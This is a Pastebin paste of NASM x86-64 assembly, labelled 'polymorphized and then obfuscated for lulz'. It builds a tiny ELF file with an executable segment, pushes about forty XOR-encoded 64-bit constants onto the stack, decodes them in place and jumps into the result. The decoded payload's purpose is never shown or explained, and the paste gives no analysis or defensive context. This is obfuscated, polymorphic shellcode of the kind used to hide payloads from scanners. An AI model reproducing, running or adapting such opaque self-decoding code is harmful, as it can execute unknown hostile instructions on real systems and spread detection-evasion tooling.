API tools faq
paste
Advertisement
Madmouse

polymorphized and then obfuscated for lulz

Madmouse
Jun 25th, 2016
159
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 5.48 KB | None | 0 0
raw download clone embed print report
  1. [bits 64]
  2. section .text
  3. global _start
  4. org 0x08048000
  5. ehdr:                               ; Elf64_Ehdr
  6.  db 0x7F, "ELF",                    ;   e_ident
  7.  times 12 db      0
  8.  dw 2                               ;   e_type
  9.  dw 62                              ;   e_machine
  10.  dd 1                               ;   e_version
  11.  dq _start                          ;   e_entry
  12.  dq phdr - $$                       ;   e_phoff
  13.  dq 0                               ;   e_shoff
  14.  dd 0                               ;   e_flags
  15.  dw ehdrsize                        ;   e_ehsize
  16.  dw phdrsize                        ;   e_phentsize
  17.  dw 1                               ;   e_phnum
  18.  dw 0                               ;   e_shentsize
  19.  dw 0                               ;   e_shnum
  20.  dw 0                               ;   e_shstrndx
  21.  ehdrsize equ $ - ehdr
  22. phdr:                               ; Elf64_Phdr
  23.  dd 1                               ;   p_type
  24.  dd 7                               ;   p_flags
  25.  dq 0                               ;   p_offset
  26.  dq $$                              ;   p_vaddr
  27.  dq $$                              ;   p_paddr
  28.  dq filesize                        ;   p_filesz
  29.  dq filesize                        ;   p_memsz
  30.  dq 0x1000                          ;   p_align
  31.  phdrsize equ $ - phdr
  32. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  33.  
  34. _start:
  35.     mov rax, 0xe5dfabc24a2a1d3d
  36.     push rax
  37.     xor dword [rsp+4], 0x264f6b3d
  38.     xor dword [rsp], 0x2c2a5d3d
  39.  
  40.     mov rax, 0xb0494fff64855e81
  41.     push rax
  42.     xor dword [rsp+4], 0x246c4b38
  43.     xor dword [rsp], 0x6f6e5f41
  44.  
  45.     mov rax, 0xcf4f301a67b36553
  46.     push rax
  47.     xor dword [rsp+4], 0x4c29305a
  48.     xor dword [rsp], 0x67274057
  49.  
  50.     mov rax, 0xaa643a6a9cbf705d
  51.     push rax
  52.     xor dword [rsp+4], 0x6d694f68
  53.     xor dword [rsp], 0x7c3c386c
  54.  
  55.     mov rax, 0x7af2ca84a2582e44
  56.     push rax
  57.     xor dword [rsp+4], 0x75625a44
  58.     xor dword [rsp], 0x5d586e44
  59.  
  60.     mov rax, 0xa606329e4fb9c360
  61.     push rax
  62.     xor dword [rsp+4], 0x36233659
  63.     xor dword [rsp], 0x44525361
  64.  
  65.     mov rax, 0xf6fb7c6463b11f64
  66.     push rax
  67.     xor dword [rsp+4], 0x36787c24
  68.     xor dword [rsp], 0x63213a60
  69.  
  70.     mov rax, 0xa9473c38bea70262
  71.     push rax
  72.     xor dword [rsp+4], 0x6e4a493a
  73.     xor dword [rsp], 0x5e244a53
  74.  
  75.     mov rax, 0x55cf88b4254d133d
  76.     push rax
  77.     xor dword [rsp+4], 0x5a5f484b
  78.     xor dword [rsp], 0x6d4d533d
  79.  
  80.     mov rax, 0xf5472bae4a9a23ff
  81.     push rax
  82.     xor dword [rsp+4], 0x79622f69
  83.     xor dword [rsp], 0x4171223f
  84.  
  85.     mov rax, 0xb66270363df5736e
  86.     push rax
  87.     xor dword [rsp+4], 0x352a7076
  88.     xor dword [rsp], 0x3d79566a
  89.  
  90.     mov rax, 0xe369243f9dfa2046
  91.     push rax
  92.     xor dword [rsp+4], 0x2464513d
  93.     xor dword [rsp], 0x7d796877
  94.  
  95.     mov rax, 0x7df6f0a1bf320640
  96.     push rax
  97.     xor dword [rsp+4], 0x72666043
  98.     xor dword [rsp], 0x40324640
  99.  
  100.     mov rax, 0x944f6fa0709ad4e1
  101.     push rax
  102.     xor dword [rsp+4], 0x466a6b67
  103.     xor dword [rsp], 0x7b714471
  104.  
  105.     mov rax, 0xab2f361321ea472b
  106.     push rax
  107.     xor dword [rsp+4], 0x687d3653
  108.     xor dword [rsp], 0x2138622f
  109.  
  110.     mov rax, 0xf16b3461b2e26301
  111.     push rax
  112.     xor dword [rsp+4], 0x36664163
  113.     xor dword [rsp], 0x52612b30
  114.  
  115.     mov rax, 0x23a6c2c7c96f7075
  116.     push rax
  117.     xor dword [rsp+4], 0x2c365226
  118.     xor dword [rsp], 0x366f3075
  119.  
  120.     mov rax, 0x9c1a5fb06ab9fbf9
  121.     push rax
  122.     xor dword [rsp+4], 0x5e3f5b77
  123.     xor dword [rsp], 0x61526b69
  124.  
  125.     mov rax, 0x8c0a5f7d50a77151
  126.     push rax
  127.     xor dword [rsp+4], 0x4f5b5f3d
  128.     xor dword [rsp], 0x50655455
  129.  
  130.     mov rax, 0xf6511d33b3d33103
  131.     push rax
  132.     xor dword [rsp+4], 0x315c6831
  133.     xor dword [rsp], 0x53507932
  134.  
  135.     mov rax, 0x37aea59a8545253f
  136.     push rax
  137.     xor dword [rsp+4], 0x383e3579
  138.     xor dword [rsp], 0x7a45653f
  139.  
  140.     mov rax, 0xd76e5aad6cb9f2d0
  141.     push rax
  142.     xor dword [rsp+4], 0x654b5e6a
  143.     xor dword [rsp], 0x67526240
  144.  
  145.     mov rax, 0x8e70752e2290607c
  146.     push rax
  147.     xor dword [rsp+4], 0x4d23756e
  148.     xor dword [rsp], 0x22224578
  149.  
  150.     mov rax, 0x97740922aaaa320e
  151.     push rax
  152.     xor dword [rsp+4], 0x50797c20
  153.     xor dword [rsp], 0x4a297a3f
  154.  
  155.     mov rax, 0x4bd7d0d4c4650a26
  156.     push rax
  157.     xor dword [rsp+4], 0x44474034
  158.     xor dword [rsp], 0x3b654a26
  159.  
  160.     mov rax, 0x83615fe859d3e0a7
  161.     push rax
  162.     xor dword [rsp+4], 0x21445b2f
  163.     xor dword [rsp], 0x52387037
  164.  
  165.     mov rax, 0xaa1477203d885f54
  166.     push rax
  167.     xor dword [rsp+4], 0x69447760
  168.     xor dword [rsp], 0x3d2a7a50
  169.  
  170.     mov rax, 0x8945027fc2c0771b
  171.     push rax
  172.     xor dword [rsp+4], 0x4e48777d
  173.     xor dword [rsp], 0x22433f2a
  174.  
  175.     mov rax, 0x578367d1ea83d058
  176.     push rax
  177.     xor dword [rsp+4], 0x58403541
  178.     xor dword [rsp], 0x7a612f58
  179.  
  180.     mov rax, 0x2d375c636c5ef894
  181.     push rax
  182.     xor dword [rsp+4], 0x2d375c63
  183.     xor dword [rsp], 0x2c5e782e
  184.  
  185.     mov rax, 0x33fd77dbfad2d642
  186.     push rax
  187.     xor dword [rsp+4], 0x7b3e264b
  188.     xor dword [rsp], 0x6a332942
  189.  
  190.     mov rax, 0x2d2a324f6f30e9d6
  191.     push rax
  192.     xor dword [rsp+4], 0x2d2a324f
  193.     xor dword [rsp], 0x2f30696f
  194.  
  195.     mov rax, 0x2a9e21afd7baa733
  196.     push rax
  197.     xor dword [rsp+4], 0x625d723f
  198.     xor dword [rsp], 0x47595833
  199.  
  200.     mov rax, 0x41693f450c4fcb81
  201.     push rax
  202.     xor dword [rsp+4], 0x41693f45
  203.     xor dword [rsp], 0x4c4f4b3a
  204.  
  205.     mov rax, 0x75f969e5ca8cc22a
  206.     push rax
  207.     xor dword [rsp+4], 0x3d3a3975
  208.     xor dword [rsp], 0x5a6c3d2a
  209.  
  210.     mov rax, 0x4e26633c1b35b3ef
  211.     push rax
  212.     xor dword [rsp+4], 0x4e26633c
  213.     xor dword [rsp], 0x5b353357
  214.  
  215.     mov rax, 0x2dd8a9d904debd8e
  216.     push rax
  217.     xor dword [rsp+4], 0x65486926
  218.     xor dword [rsp], 0x624e2d4e
  219.  
  220.     mov rax, 0x9ef38a927c7a3f78
  221.     push rax
  222.     xor dword [rsp+4], 0x61634a6d
  223.     xor dword [rsp], 0x347a3f78
  224.  
  225.     mov rax, 0x26a32c3c3f5d4406
  226.     push rax
  227.     xor dword [rsp+4], 0x6a4b2933
  228.     xor dword [rsp], 0x3f5d443a
  229.  
  230.     mov rax, 0xe9d2c3bce6c3c3d5
  231.     push rax
  232.     xor dword [rsp+4], 0x5142532c
  233.     xor dword [rsp], 0x76535345
  234.  
  235.     push rsp
  236.     ret
  237. filesize equ $ - $$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!